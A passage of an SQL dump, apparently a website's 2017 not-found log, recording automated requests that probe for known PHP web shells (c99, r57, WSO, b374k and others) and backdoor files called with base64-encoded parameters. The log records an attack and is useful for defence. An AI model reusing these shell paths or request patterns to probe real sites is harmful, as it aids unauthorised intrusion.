00:00:00'),(9903,'http://hallcrestheights.org/Marion001.php',NULL,'','',1,0,'2017-05-25 13:16:55','0000-00-00 00:00:00'),(9904,'http://hallcrestheights.org/webr00tv3.php',NULL,'','',1,0,'2017-05-25 13:15:35','0000-00-00 00:00:00'),(9905,'http://hallcrestheights.org/mysheller.php',NULL,'','',1,0,'2017-05-25 13:16:56','0000-00-00 00:00:00'),(9906,'http://hallcrestheights.org/cv.php',NULL,'','',27,0,'2017-05-25 13:16:57','0000-00-00 00:00:00'),(9907,'http://hallcrestheights.org/spotshell.php',NULL,'','',1,0,'2017-05-25 13:15:37','0000-00-00 00:00:00'),(9908,'http://hallcrestheights.org/tmp/admin.php',NULL,'','',1,0,'2017-05-25 13:16:58','0000-00-00 00:00:00'),(9909,'http://hallcrestheights.org/tmp/priv8.php',NULL,'','',1,0,'2017-05-25 13:16:59','0000-00-00 00:00:00'),(9910,'http://hallcrestheights.org/tmp/whmcs.php',NULL,'','',1,0,'2017-05-25 13:17:00','0000-00-00 00:00:00'),(9911,'http://hallcrestheights.org/webadmin.html',NULL,'','',1,0,'2017-05-25 13:17:00','0000-00-00 00:00:00'),(9912,'http://hallcrestheights.org/yourshell.php',NULL,'','',1,0,'2017-05-25 13:17:01','0000-00-00 00:00:00'),(9913,'http://hallcrestheights.org/images//dz.php',NULL,'','',1,0,'2017-05-25 13:15:41','0000-00-00 00:00:00'),(9914,'http://hallcrestheights.org/images//sa.php',NULL,'','',1,0,'2017-05-25 13:15:42','0000-00-00 00:00:00'),(9915,'http://hallcrestheights.org/images//up.php',NULL,'','',1,0,'2017-05-25 13:17:03','0000-00-00 00:00:00'),(9916,'http://hallcrestheights.org/images/123.php',NULL,'','',1,0,'2017-05-25 13:15:43','0000-00-00 00:00:00'),(9917,'http://hallcrestheights.org/images/c22.php',NULL,'','',1,0,'2017-05-25 13:17:04','0000-00-00 00:00:00'),(9918,'http://hallcrestheights.org/images/c99.php',NULL,'','',1,0,'2017-05-25 13:15:44','0000-00-00 00:00:00'),(9919,'http://hallcrestheights.org/images/cpn.php',NULL,'','',1,0,'2017-05-25 13:15:45','0000-00-00 00:00:00'),(9920,'http://hallcrestheights.org/images/dam.php',NULL,'','',1,0,'2017-05-25 13:17:06','0000-00-00 00:00:00'),(9921,'http://hallcrestheights.org/images/dom.php',NULL,'','',1,0,'2017-05-25 13:17:06','0000-00-00 00:00:00'),(9922,'http://hallcrestheights.org/images/dz0.php',NULL,'','',1,0,'2017-05-25 13:17:07','0000-00-00 00:00:00'),(9923,'http://hallcrestheights.org/images/dz1.php',NULL,'','',1,0,'2017-05-25 13:17:07','0000-00-00 00:00:00'),(9924,'http://hallcrestheights.org/images/L3b.php',NULL,'','',1,0,'2017-05-25 13:17:08','0000-00-00 00:00:00'),(9925,'http://hallcrestheights.org/images/sos.php',NULL,'','',1,0,'2017-05-25 13:15:48','0000-00-00 00:00:00'),(9926,'http://hallcrestheights.org/images/sql.php',NULL,'','',1,0,'2017-05-25 13:17:09','0000-00-00 00:00:00'),(9927,'http://hallcrestheights.org/images/ssl.php',NULL,'','',1,0,'2017-05-25 13:17:09','0000-00-00 00:00:00'),(9928,'http://hallcrestheights.org/images/Sym.php',NULL,'','',1,0,'2017-05-25 13:15:49','0000-00-00 00:00:00'),(9929,'http://hallcrestheights.org/images/xai.php',NULL,'','',1,0,'2017-05-25 13:15:50','0000-00-00 00:00:00'),(9930,'http://hallcrestheights.org/includes/1.php',NULL,'','',1,0,'2017-05-25 13:17:11','0000-00-00 00:00:00'),(9931,'http://hallcrestheights.org/includes/2.php',NULL,'','',1,0,'2017-05-25 13:17:11','0000-00-00 00:00:00'),(9932,'http://hallcrestheights.org/includes/b.php',NULL,'','',1,0,'2017-05-25 13:17:12','0000-00-00 00:00:00'),(9933,'http://hallcrestheights.org/includes/c.php',NULL,'','',1,0,'2017-05-25 13:17:13','0000-00-00 00:00:00'),(9934,'http://hallcrestheights.org/includes/g.php',NULL,'','',1,0,'2017-05-25 13:17:15','0000-00-00 00:00:00'),(9935,'http://hallcrestheights.org/includes/k.php',NULL,'','',1,0,'2017-05-25 13:17:15','0000-00-00 00:00:00'),(9936,'http://hallcrestheights.org/includes/m.php',NULL,'','',1,0,'2017-05-25 13:17:15','0000-00-00 00:00:00'),(9937,'http://hallcrestheights.org/includes/X.php',NULL,'','',1,0,'2017-05-25 13:15:56','0000-00-00 00:00:00'),(9938,'http://hallcrestheights.org/IndoXploit.php',NULL,'','',1,0,'2017-05-25 13:17:16','0000-00-00 00:00:00'),(9939,'http://hallcrestheights.org/ModeBypass.php',NULL,'','',1,0,'2017-05-25 13:15:57','0000-00-00 00:00:00'),(9940,'http://hallcrestheights.org/tmp/killer.php',NULL,'','',1,0,'2017-05-25 13:17:17','0000-00-00 00:00:00'),(9941,'http://hallcrestheights.org/tmp/readme.php',NULL,'','',1,0,'2017-05-25 13:17:18','0000-00-00 00:00:00'),(9942,'http://hallcrestheights.org/tmp/upload.php',NULL,'','',1,0,'2017-05-25 13:17:18','0000-00-00 00:00:00'),(9943,'http://hallcrestheights.org/dam.phpuser.php',NULL,'','',1,0,'2017-05-25 13:17:19','0000-00-00 00:00:00'),(9944,'http://hallcrestheights.org/images//r57.php',NULL,'','',1,0,'2017-05-25 13:17:19','0000-00-00 00:00:00'),(9945,'http://hallcrestheights.org/images//sa2.php',NULL,'','',1,0,'2017-05-25 13:17:20','0000-00-00 00:00:00'),(9946,'http://hallcrestheights.org/images//t00.php',NULL,'','',1,0,'2017-05-25 13:17:20','0000-00-00 00:00:00'),(9947,'http://hallcrestheights.org/images/0day.php',NULL,'','',1,0,'2017-05-25 13:16:01','0000-00-00 00:00:00'),(9948,'http://hallcrestheights.org/images/c100.php',NULL,'','',1,0,'2017-05-25 13:16:01','0000-00-00 00:00:00'),(9949,'http://hallcrestheights.org/images/gaza.php',NULL,'','',1,0,'2017-05-25 13:17:22','0000-00-00 00:00:00'),(9950,'http://hallcrestheights.org/images/info.php',NULL,'','',1,0,'2017-05-25 13:17:22','0000-00-00 00:00:00'),(9951,'http://hallcrestheights.org/images/r00t.php',NULL,'','',1,0,'2017-05-25 13:16:03','0000-00-00 00:00:00'),(9952,'http://hallcrestheights.org/images/root.php',NULL,'','',1,0,'2017-05-25 13:17:24','0000-00-00 00:00:00'),(9953,'http://hallcrestheights.org/images/sado.php',NULL,'','',1,0,'2017-05-25 13:17:24','0000-00-00 00:00:00'),(9954,'http://hallcrestheights.org/images/term.php',NULL,'','',1,0,'2017-05-25 13:17:25','0000-00-00 00:00:00'),(9955,'http://hallcrestheights.org/images/user.php',NULL,'','',1,0,'2017-05-25 13:17:25','0000-00-00 00:00:00'),(9956,'http://hallcrestheights.org/images/WolF.php',NULL,'','',1,0,'2017-05-25 13:17:27','0000-00-00 00:00:00'),(9957,'http://hallcrestheights.org/includes//2.php',NULL,'','',1,0,'2017-05-25 13:16:07','0000-00-00 00:00:00'),(9958,'http://hallcrestheights.org/includes/cp.php',NULL,'','',1,0,'2017-05-25 13:17:28','0000-00-00 00:00:00'),(9959,'http://hallcrestheights.org/includes/dz.php',NULL,'','',1,0,'2017-05-25 13:17:29','0000-00-00 00:00:00'),(9960,'http://hallcrestheights.org/includes/ls.php',NULL,'','',1,0,'2017-05-25 13:17:29','0000-00-00 00:00:00'),(9961,'http://hallcrestheights.org/includes/sa.php',NULL,'','',1,0,'2017-05-25 13:17:30','0000-00-00 00:00:00'),(9962,'http://hallcrestheights.org/includes/up.php',NULL,'','',1,0,'2017-05-25 13:17:31','0000-00-00 00:00:00'),(9963,'http://hallcrestheights.org/includes/wp.php',NULL,'','',1,0,'2017-05-25 13:17:31','0000-00-00 00:00:00'),(9964,'http://hallcrestheights.org/includes/xd.php',NULL,'','',1,0,'2017-05-25 13:17:32','0000-00-00 00:00:00'),(9965,'http://hallcrestheights.org/k.phpzone-h.php',NULL,'','',1,0,'2017-05-25 13:17:33','0000-00-00 00:00:00'),(9966,'http://hallcrestheights.org/offline.php.php',NULL,'','',1,0,'2017-05-25 13:17:33','0000-00-00 00:00:00'),(9967,'http://hallcrestheights.org/tmp/d0maine.php',NULL,'','',1,0,'2017-05-25 13:17:34','0000-00-00 00:00:00'),(9968,'http://hallcrestheights.org/tmp/domaine.php',NULL,'','',1,0,'2017-05-25 13:17:34','0000-00-00 00:00:00'),(9969,'http://hallcrestheights.org/tmp/uploads.php',NULL,'','',1,0,'2017-05-25 13:17:35','0000-00-00 00:00:00'),(9970,'http://hallcrestheights.org/uploadshell.php',NULL,'','',1,0,'2017-05-25 13:16:15','0000-00-00 00:00:00'),(9971,'http://hallcrestheights.org/dom.phpwhmcs.php',NULL,'','',1,0,'2017-05-25 13:17:36','0000-00-00 00:00:00'),(9972,'http://hallcrestheights.org/images//amad.php',NULL,'','',1,0,'2017-05-25 13:17:37','0000-00-00 00:00:00'),(9973,'http://hallcrestheights.org/images//gaza.php',NULL,'','',1,0,'2017-05-25 13:17:37','0000-00-00 00:00:00'),(9974,'http://hallcrestheights.org/images/mysql.php',NULL,'','',1,0,'2017-05-25 13:17:37','0000-00-00 00:00:00'),(9975,'http://hallcrestheights.org/images/Sabun.php',NULL,'','',1,0,'2017-05-25 13:17:38','0000-00-00 00:00:00'),(9976,'http://hallcrestheights.org/images/Sh3ll.php',NULL,'','',1,0,'2017-05-25 13:17:38','0000-00-00 00:00:00'),(9977,'http://hallcrestheights.org/images/shell.php',NULL,'','',1,0,'2017-05-25 13:16:19','0000-00-00 00:00:00'),(9978,'http://hallcrestheights.org/images/tmp/2.php',NULL,'','',1,0,'2017-05-25 13:16:19','0000-00-00 00:00:00'),(9979,'http://hallcrestheights.org/images/tmp/d.php',NULL,'','',1,0,'2017-05-25 13:17:40','0000-00-00 00:00:00'),(9980,'http://hallcrestheights.org/images/whmcs.php',NULL,'','',1,0,'2017-05-25 13:17:41','0000-00-00 00:00:00'),(9981,'http://hallcrestheights.org/includes//dz.php',NULL,'','',1,0,'2017-05-25 13:16:21','0000-00-00 00:00:00'),(9982,'http://hallcrestheights.org/includes//sa.php',NULL,'','',1,0,'2017-05-25 13:17:42','0000-00-00 00:00:00'),(9983,'http://hallcrestheights.org/includes//up.php',NULL,'','',1,0,'2017-05-25 13:17:43','0000-00-00 00:00:00'),(9984,'http://hallcrestheights.org/includes/123.php',NULL,'','',1,0,'2017-05-25 13:17:43','0000-00-00 00:00:00'),(9985,'http://hallcrestheights.org/includes/c22.php',NULL,'','',1,0,'2017-05-25 13:17:44','0000-00-00 00:00:00'),(9986,'http://hallcrestheights.org/includes/c99.php',NULL,'','',1,0,'2017-05-25 13:16:23','0000-00-00 00:00:00'),(9987,'http://hallcrestheights.org/includes/cpn.php',NULL,'','',1,0,'2017-05-25 13:17:44','0000-00-00 00:00:00'),(9988,'http://hallcrestheights.org/includes/dam.php',NULL,'','',1,0,'2017-05-25 13:17:45','0000-00-00 00:00:00'),(9989,'http://hallcrestheights.org/includes/dom.php',NULL,'','',1,0,'2017-05-25 13:17:45','0000-00-00 00:00:00'),(9990,'http://hallcrestheights.org/includes/dz0.php',NULL,'','',1,0,'2017-05-25 13:17:46','0000-00-00 00:00:00'),(9991,'http://hallcrestheights.org/includes/dz1.php',NULL,'','',1,0,'2017-05-25 13:17:46','0000-00-00 00:00:00'),(9992,'http://hallcrestheights.org/includes/L3b.php',NULL,'','',1,0,'2017-05-25 13:17:47','0000-00-00 00:00:00'),(9993,'http://hallcrestheights.org/includes/r57.php',NULL,'','',1,0,'2017-05-25 13:17:47','0000-00-00 00:00:00'),(9994,'http://hallcrestheights.org/includes/sos.php',NULL,'','',1,0,'2017-05-25 13:16:27','0000-00-00 00:00:00'),(9995,'http://hallcrestheights.org/includes/sql.php',NULL,'','',1,0,'2017-05-25 13:16:28','0000-00-00 00:00:00'),(9996,'http://hallcrestheights.org/includes/ssl.php',NULL,'','',1,0,'2017-05-25 13:17:48','0000-00-00 00:00:00'),(9997,'http://hallcrestheights.org/includes/Sym.php',NULL,'','',1,0,'2017-05-25 13:17:49','0000-00-00 00:00:00'),(9998,'http://hallcrestheights.org/includes/WSO.php',NULL,'','',1,0,'2017-05-25 13:17:49','0000-00-00 00:00:00'),(9999,'http://hallcrestheights.org/madspotshell.php',NULL,'','',1,0,'2017-05-25 13:17:49','0000-00-00 00:00:00'),(10000,'http://hallcrestheights.org/syrian_shell.php',NULL,'','',1,0,'2017-05-25 13:16:30','0000-00-00 00:00:00'),(10001,'http://hallcrestheights.org/wp-admin/c99.php',NULL,'','',1,0,'2017-05-25 13:17:50','0000-00-00 00:00:00'),(10002,'http://hallcrestheights.org/x00x_configs.php',NULL,'','',1,0,'2017-05-25 13:17:51','0000-00-00 00:00:00'),(10003,'http://hallcrestheights.org/configurationzsb.php',NULL,'','',1,0,'2017-05-25 13:17:52','0000-00-00 00:00:00'),(10004,'http://hallcrestheights.org/downloads/dom.php',NULL,'','',1,0,'2017-05-25 13:17:52','0000-00-00 00:00:00'),(10005,'http://hallcrestheights.org/images//admin.php',NULL,'','',1,0,'2017-05-25 13:17:53','0000-00-00 00:00:00'),(10006,'http://hallcrestheights.org/images//Black.php',NULL,'','',1,0,'2017-05-25 13:17:54','0000-00-00 00:00:00'),(10007,'http://hallcrestheights.org/images//shell.php',NULL,'','',1,0,'2017-05-25 13:16:34','0000-00-00 00:00:00'),(10008,'http://hallcrestheights.org/images/admin1.php',NULL,'','',1,0,'2017-05-25 13:17:55','0000-00-00 00:00:00'),(10009,'http://hallcrestheights.org/images/cpanel.php',NULL,'','',1,0,'2017-05-25 13:17:55','0000-00-00 00:00:00'),(10010,'http://hallcrestheights.org/images/killer.php',NULL,'','',1,0,'2017-05-25 13:17:56','0000-00-00 00:00:00'),(10011,'http://hallcrestheights.org/images/noname.php',NULL,'','',1,0,'2017-05-25 13:17:56','0000-00-00 00:00:00'),(10012,'http://hallcrestheights.org/images/sniper.php',NULL,'','',1,0,'2017-05-25 13:17:57','0000-00-00 00:00:00'),(10013,'http://hallcrestheights.org/images/tmp/dz.php',NULL,'','',1,0,'2017-05-25 13:17:57','0000-00-00 00:00:00'),(10014,'http://hallcrestheights.org/images/upload.php',NULL,'','',1,0,'2017-05-25 13:17:58','0000-00-00 00:00:00'),(10015,'http://hallcrestheights.org/images/zone-h.php',NULL,'','',1,0,'2017-05-25 13:16:38','0000-00-00 00:00:00'),(10016,'http://hallcrestheights.org/includes//r57.php',NULL,'','',1,0,'2017-05-25 13:18:00','0000-00-00 00:00:00'),(10017,'http://hallcrestheights.org/includes//sa2.php',NULL,'','',1,0,'2017-05-25 13:18:00','0000-00-00 00:00:00'),(10018,'http://hallcrestheights.org/includes//t00.php',NULL,'','',1,0,'2017-05-25 13:18:01','0000-00-00 00:00:00'),(10019,'http://hallcrestheights.org/includes/c100.php',NULL,'','',1,0,'2017-05-25 13:18:07','0000-00-00 00:00:00'),(10020,'http://hallcrestheights.org/includes/gaza.php',NULL,'','',1,0,'2017-05-25 13:18:07','0000-00-00 00:00:00'),(10021,'http://hallcrestheights.org/includes/info.php',NULL,'','',1,0,'2017-05-25 13:18:08','0000-00-00 00:00:00'),(10022,'http://hallcrestheights.org/includes/r00t.php',NULL,'','',1,0,'2017-05-25 13:16:48','0000-00-00 00:00:00'),(10023,'http://hallcrestheights.org/includes/sado.php',NULL,'','',1,0,'2017-05-25 13:18:09','0000-00-00 00:00:00'),(10024,'http://hallcrestheights.org/includes/term.php',NULL,'','',1,0,'2017-05-25 13:16:52','0000-00-00 00:00:00'),(10025,'http://hallcrestheights.org/includes/user.php',NULL,'','',1,0,'2017-05-25 13:18:14','0000-00-00 00:00:00'),(10026,'http://hallcrestheights.org/includes/WolF.php',NULL,'','',1,0,'2017-05-25 13:18:14','0000-00-00 00:00:00'),(10027,'http://hallcrestheights.org/libraries/imi.php',NULL,'','',1,0,'2017-05-25 13:16:55','0000-00-00 00:00:00'),(10028,'http://hallcrestheights.org/libraries/wso.php',NULL,'','',1,0,'2017-05-25 13:16:55','0000-00-00 00:00:00'),(10029,'http://hallcrestheights.org/tmp/changeall.php',NULL,'','',1,0,'2017-05-25 13:18:16','0000-00-00 00:00:00'),(10030,'http://hallcrestheights.org/billing/killer.php',NULL,'','',1,0,'2017-05-25 13:18:17','0000-00-00 00:00:00'),(10031,'http://hallcrestheights.org/images//upload.php',NULL,'','',1,0,'2017-05-25 13:18:18','0000-00-00 00:00:00'),(10032,'http://hallcrestheights.org/images/d0maine.php',NULL,'','',1,0,'2017-05-25 13:16:58','0000-00-00 00:00:00'),(10033,'http://hallcrestheights.org/images/d0mains.php',NULL,'','',1,0,'2017-05-25 13:18:19','0000-00-00 00:00:00'),(10034,'http://hallcrestheights.org/images/madspot.php',NULL,'','',1,0,'2017-05-25 13:16:59','0000-00-00 00:00:00'),(10035,'http://hallcrestheights.org/images/Sec-War.php',NULL,'','',1,0,'2017-05-25 13:18:20','0000-00-00 00:00:00'),(10036,'http://hallcrestheights.org/images/sql-new.php',NULL,'','',1,0,'2017-05-25 13:18:20','0000-00-00 00:00:00'),(10037,'http://hallcrestheights.org/images/Symlink.php',NULL,'','',1,0,'2017-05-25 13:17:00','0000-00-00 00:00:00'),(10038,'http://hallcrestheights.org/images/tmp/cpn.php',NULL,'','',1,0,'2017-05-25 13:18:21','0000-00-00 00:00:00'),(10039,'http://hallcrestheights.org/images/tmp/dz1.php',NULL,'','',1,0,'2017-05-25 13:18:22','0000-00-00 00:00:00'),(10040,'http://hallcrestheights.org/images/tmp/L3b.php',NULL,'','',1,0,'2017-05-25 13:18:22','0000-00-00 00:00:00'),(10041,'http://hallcrestheights.org/images/tmp/sql.php',NULL,'','',1,0,'2017-05-25 13:18:24','0000-00-00 00:00:00'),(10042,'http://hallcrestheights.org/images/tmp/Sym.php',NULL,'','',1,0,'2017-05-25 13:18:24','0000-00-00 00:00:00'),(10043,'http://hallcrestheights.org/images/uploads.php',NULL,'','',1,0,'2017-05-25 13:18:25','0000-00-00 00:00:00'),(10044,'http://hallcrestheights.org/includes//amad.php',NULL,'','',1,0,'2017-05-25 13:17:05','0000-00-00 00:00:00'),(10045,'http://hallcrestheights.org/includes//gaza.php',NULL,'','',1,0,'2017-05-25 13:18:26','0000-00-00 00:00:00'),(10046,'http://hallcrestheights.org/includes/b374k.php',NULL,'','',1,0,'2017-05-25 13:18:27','0000-00-00 00:00:00'),(10047,'http://hallcrestheights.org/includes/bluff.php',NULL,'','',1,0,'2017-05-25 13:18:27','0000-00-00 00:00:00'),(10048,'http://hallcrestheights.org/includes/mysql.php',NULL,'','',1,0,'2017-05-25 13:18:28','0000-00-00 00:00:00'),(10049,'http://hallcrestheights.org/includes/priv8.php',NULL,'','',1,0,'2017-05-25 13:18:28','0000-00-00 00:00:00'),(10050,'http://hallcrestheights.org/includes/Sh3ll.php',NULL,'','',1,0,'2017-05-25 13:18:29','0000-00-00 00:00:00'),(10051,'http://hallcrestheights.org/includes/shell.php',NULL,'','',1,0,'2017-05-25 13:18:29','0000-00-00 00:00:00'),(10052,'http://hallcrestheights.org/includes/tmp/2.php',NULL,'','',1,0,'2017-05-25 13:18:30','0000-00-00 00:00:00'),(10053,'http://hallcrestheights.org/includes/tmp/d.php',NULL,'','',1,0,'2017-05-25 13:18:30','0000-00-00 00:00:00'),(10054,'http://hallcrestheights.org/includes/whmcs.php',NULL,'','',1,0,'2017-05-25 13:18:31','0000-00-00 00:00:00'),(10055,'http://hallcrestheights.org/system/logs/am.php',NULL,'','',1,0,'2017-05-25 13:18:31','0000-00-00 00:00:00'),(10056,'http://hallcrestheights.org/system/logs/cc.php',NULL,'','',1,0,'2017-05-25 13:17:12','0000-00-00 00:00:00'),(10057,'http://hallcrestheights.org/system/logs/up.php',NULL,'','',1,0,'2017-05-25 13:18:33','0000-00-00 00:00:00'),(10058,'http://hallcrestheights.org/images//uploads.php',NULL,'','',1,0,'2017-05-25 13:18:33','0000-00-00 00:00:00'),(10059,'http://hallcrestheights.org/images/abuhlail.php',NULL,'','',1,0,'2017-05-25 13:18:33','0000-00-00 00:00:00'),(10060,'http://hallcrestheights.org/images/egyshell.php',NULL,'','',1,0,'2017-05-25 13:18:34','0000-00-00 00:00:00'),(10061,'http://hallcrestheights.org/images/r00t-s3c.php',NULL,'','',1,0,'2017-05-25 13:18:34','0000-00-00 00:00:00'),(10062,'http://hallcrestheights.org/images/tmp/root.php',NULL,'','',1,0,'2017-05-25 13:18:36','0000-00-00 00:00:00'),(10063,'http://hallcrestheights.org/images/tmp/user.php',NULL,'','',1,0,'2017-05-25 13:18:36','0000-00-00 00:00:00'),(10064,'http://hallcrestheights.org/images/tmp/vaga.php',NULL,'','',1,0,'2017-05-25 13:18:37','0000-00-00 00:00:00'),(10065,'http://hallcrestheights.org/includes//admin.php',NULL,'','',1,0,'2017-05-25 13:17:17','0000-00-00 00:00:00'),(10066,'http://hallcrestheights.org/includes//Black.php',NULL,'','',1,0,'2017-05-25 13:18:38','0000-00-00 00:00:00'),(10067,'http://hallcrestheights.org/includes//shell.php',NULL,'','',1,0,'2017-05-25 13:18:38','0000-00-00 00:00:00'),(10068,'http://hallcrestheights.org/includes/admin1.php',NULL,'','',1,0,'2017-05-25 13:17:19','0000-00-00 00:00:00'),(10069,'http://hallcrestheights.org/includes/admins.php',NULL,'','',1,0,'2017-05-25 13:18:39','0000-00-00 00:00:00'),(10070,'http://hallcrestheights.org/includes/cpanel.php',NULL,'','',1,0,'2017-05-25 13:18:40','0000-00-00 00:00:00'),(10071,'http://hallcrestheights.org/includes/killer.php',NULL,'','',1,0,'2017-05-25 13:17:21','0000-00-00 00:00:00'),(10072,'http://hallcrestheights.org/includes/Server.php',NULL,'','',1,0,'2017-05-25 13:18:41','0000-00-00 00:00:00'),(10073,'http://hallcrestheights.org/includes/sniper.php',NULL,'','',1,0,'2017-05-25 13:18:43','0000-00-00 00:00:00'),(10074,'http://hallcrestheights.org/includes/tmp/dz.php',NULL,'','',1,0,'2017-05-25 13:18:43','0000-00-00 00:00:00'),(10075,'http://hallcrestheights.org/includes/tmp/up.php',NULL,'','',1,0,'2017-05-25 13:18:44','0000-00-00 00:00:00'),(10076,'http://hallcrestheights.org/includes/tmp/xd.php',NULL,'','',1,0,'2017-05-25 13:18:45','0000-00-00 00:00:00'),(10077,'http://hallcrestheights.org/includes/upload.php',NULL,'','',1,0,'2017-05-25 13:18:45','0000-00-00 00:00:00'),(10078,'http://hallcrestheights.org/includes/zone-h.php',NULL,'','',1,0,'2017-05-25 13:18:46','0000-00-00 00:00:00'),(10079,'http://hallcrestheights.org/system/logs/twe.php',NULL,'','',1,0,'2017-05-25 13:18:47','0000-00-00 00:00:00'),(10080,'http://hallcrestheights.org/images/changeall.php',NULL,'','',1,0,'2017-05-25 13:17:27','0000-00-00 00:00:00'),(10081,'http://hallcrestheights.org/images/stories/w.php',NULL,'','',1,0,'2017-05-25 13:18:48','0000-00-00 00:00:00'),(10082,'http://hallcrestheights.org/images/tmp/admin.php',NULL,'','',1,0,'2017-05-25 13:17:29','0000-00-00 00:00:00'),(10083,'http://hallcrestheights.org/images/tmp/index.php',NULL,'','',1,0,'2017-05-25 13:18:50','0000-00-00 00:00:00'),(10084,'http://hallcrestheights.org/images/tmp/whmcs.php',NULL,'','',1,0,'2017-05-25 13:18:50','0000-00-00 00:00:00'),(10085,'http://hallcrestheights.org/sqlbak.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-25 20:38:55','0000-00-00 00:00:00'),(10086,'http://hallcrestheights.org/sql-bak.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:39:03','0000-00-00 00:00:00'),(10087,'http://hallcrestheights.org/email.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:39:14','0000-00-00 00:00:00'),(10088,'http://hallcrestheights.org/pols.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:39:24','0000-00-00 00:00:00'),(10089,'http://hallcrestheights.org/ytt.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:40:00','0000-00-00 00:00:00'),(10090,'http://hallcrestheights.org/functions.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:41:42','0000-00-00 00:00:00'),(10091,'http://hallcrestheights.org/cache/news.php?z3=SjFnSWo0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:42:04','0000-00-00 00:00:00'),(10092,'http://hallcrestheights.org/shootme.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',8,0,'2017-05-25 20:42:28','0000-00-00 00:00:00'),(10093,'http://hallcrestheights.org/configurationbak.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:41:14','0000-00-00 00:00:00'),(10094,'http://hallcrestheights.org/robots.txt.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:42:45','0000-00-00 00:00:00'),(10095,'http://hallcrestheights.org/jconfig.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:42:55','0000-00-00 00:00:00'),(10096,'http://hallcrestheights.org/media/reads.php?z3=SjFnSWo0LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:43:03','0000-00-00 00:00:00'),(10097,'http://hallcrestheights.org/media/1ndex.php?z3=SjFnSWo0LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:43:12','0000-00-00 00:00:00'),(10098,'http://hallcrestheights.org/sql_dump.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:43:33','0000-00-00 00:00:00'),(10099,'http://hallcrestheights.org/error-logs.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:42:36','0000-00-00 00:00:00'),(10100,'http://hallcrestheights.org/media/404.php?z3=SjFnSWo0LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:42:48','0000-00-00 00:00:00'),(10101,'http://hallcrestheights.org/media/tmp.php?z3=SjFnSWo0LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:44:19','0000-00-00 00:00:00'),(10102,'http://hallcrestheights.org/log.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:43:22','0000-00-00 00:00:00'),(10103,'http://hallcrestheights.org/images/stories/0day.php?z3=SjFnSWo0LnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:43:35','0000-00-00 00:00:00'),(10104,'http://hallcrestheights.org/includes/u2p.php?z3=SjFnSWo0LnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:45:04','0000-00-00 00:00:00'),(10105,'http://hallcrestheights.org/images/xxx.php?z3=SjFnSWo0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:45:15','0000-00-00 00:00:00'),(10106,'http://hallcrestheights.org/al277.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:45:27','0000-00-00 00:00:00'),(10107,'http://hallcrestheights.org/wp-admin/options-media.php?z3=SjFnSWo0LnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:45:39','0000-00-00 00:00:00'),(10108,'http://hallcrestheights.org/wp-content/advanced-cache.php?z3=SjFnSWo0LnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:45:53','0000-00-00 00:00:00'),(10109,'http://hallcrestheights.org/roubt.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:46:05','0000-00-00 00:00:00'),(10110,'http://hallcrestheights.org/images/al277.php?z3=SjFnSWo0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:46:26','0000-00-00 00:00:00'),(10111,'http://hallcrestheights.org/webconfig.txt.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:45:17','0000-00-00 00:00:00'),(10112,'http://hallcrestheights.org/cache/cachee.php?z3=SjFnSWo0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:45:30','0000-00-00 00:00:00'),(10113,'http://hallcrestheights.org/thumb.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:47:04','0000-00-00 00:00:00'),(10114,'http://hallcrestheights.org/configbak.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:47:33','0000-00-00 00:00:00'),(10115,'http://hallcrestheights.org/wp-main.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:47:45','0000-00-00 00:00:00'),(10116,'http://hallcrestheights.org/robot.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:47:57','0000-00-00 